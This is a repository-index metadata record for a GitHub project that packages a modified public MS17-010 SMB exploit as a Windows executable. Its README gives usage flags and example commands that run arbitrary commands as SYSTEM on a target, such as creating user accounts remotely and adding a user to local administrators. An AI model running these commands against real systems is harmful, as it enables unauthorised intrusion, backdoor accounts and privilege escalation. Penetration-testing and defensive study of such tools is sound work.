{"id":23169911,"url":"https://github.com/irgoncalves/ms17-010","last_synced_at":"2025-08-27T05:20:05.456Z","repository":{"id":140221542,"uuid":"164959741","full_name":"irgoncalves/ms17-010","owner":"irgoncalves","description":"This contains a bundle with an executable to exploit ms17-010 remote or locally. It does not require Python.","archived":false,"fork":false,"pushed_at":"2019-01-10T22:18:35.000Z","size":10394,"stargazers_count":16,"open_issues_count":0,"forks_count":6,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-08-18T07:36:47.211Z","etag":null,"topics":["executable","ms17-010","python"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/irgoncalves.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-01-10T00:26:00.000Z","updated_at":"2025-07-14T11:43:45.000Z","dependencies_parsed_at":null,"dependency_job_id":"85e27ec9-3ab6-4574-b61b-51438a0ef974","html_url":"https://github.com/irgoncalves/ms17-010","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/irgoncalves/ms17-010","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irgoncalves%2Fms17-010","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irgoncalves%2Fms17-010/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irgoncalves%2Fms17-010/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irgoncalves%2Fms17-010/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/irgoncalves","download_url":"https://codeload.github.com/irgoncalves/ms17-010/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irgoncalves%2Fms17-010/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":272294677,"owners_count":24908871,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-27T02:00:09.397Z","response_time":76,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["executable","ms17-010","python"],"created_at":"2024-12-18T03:25:12.575Z","updated_at":"2025-08-27T05:20:05.426Z","avatar_url":"https://github.com/irgoncalves.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ms17-010\nThis is a modified version of the [Worawit Wang: GitHub](https://github.com/worawit/MS17-010/) zzz_exploit for MS17-010.\u003cbr\u003e\nIt implements a few options such as username/password specification and an arbitrary command to be executed.\u003cbr\u003e\nIt does not change anything related to the SMB exploitation\u003cbr\u003e\nThis is a bundle with an executable and dependencies and DOES NOT require python install.\u003cbr\u003e\nBuilt with Pyinstaller.\n\n# Usage\n\nUnzip the bundle and from the command line execute ms17-010-zzz.exe\u003cbr\u003e\u003cbr\u003e\nms17-010-zzz.exe -h\u003cbr\u003e\nusage: ms17-010-zzz.exe [-h] -t TARGET -c COMMAND -P PIPE [-u USER]\n                        [-p PASSWORD]\n\u003cbr\u003e\u003cbr\u003e\nMS17-010 - zzz_explot modified and converted to binary https://github.com/irgoncalves/ms17-010\u003cbr\u003e\n\u003cbr\u003e\noptional arguments:\u003cbr\u003e\n  -h, --help            show this help message and exit\u003cbr\u003e\n  -t TARGET, --target TARGET\u003cbr\u003e\n                        Target for exploitation\u003cbr\u003e\n  -c COMMAND, --command COMMAND\u003cbr\u003e\n                        Command to be executed as a service\u003cbr\u003e\n  -P PIPE, --pipe PIPE  Pipe to connect (e.g. netlogon)\u003cbr\u003e\n  -u USER, --user USER  Username to authenticate in case no anomymous\u003cbr\u003e\n                        connection to a pipe is allowed\u003cbr\u003e\n  -p PASSWORD, --password PASSWORD\u003cbr\u003e\n                        Password for the user\u003cbr\u003e\n\u003cbr\u003e\nExample: ms17-010.exe -t 172.16.0.2 -c 'net user /add testusr teste123'\u003cbr\u003e\n\u003cbr\u003e\n\nExample to add a user remotely connecting anonymously to a named pipe:\u003cbr\u003e\nms17-010-zzz.exe -t 10.128.1.208 -c \"net user /add teste2 teste2123\"\u003cbr\u003e\n\u003cbr\u003e\nExample to add a user remotely specifying a named pipe and a valid non-administrator user:\u003cbr\u003e\nms17-010-zzz.exe -t 10.128.1.208 -c \"net user /add teste2 teste2123\" -P netlogon -u svruser -p abc123\u003cbr\u003e\n\u003cbr\u003e\nExample to locally escalate privilege for an existent user (all commands are executed by SYSTEM):\u003cbr\u003e\nms17-010-zzz.exe -t 127.0.0.1 -c \"net localgroup administrators teste2 /add\" -P netlogon -u teste2 -p teste2123\n\n# Limitations\nCurrently supports only x64 platform (Tested running from Windows 10, 2K8)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Firgoncalves%2Fms17-010","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Firgoncalves%2Fms17-010","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Firgoncalves%2Fms17-010/lists"}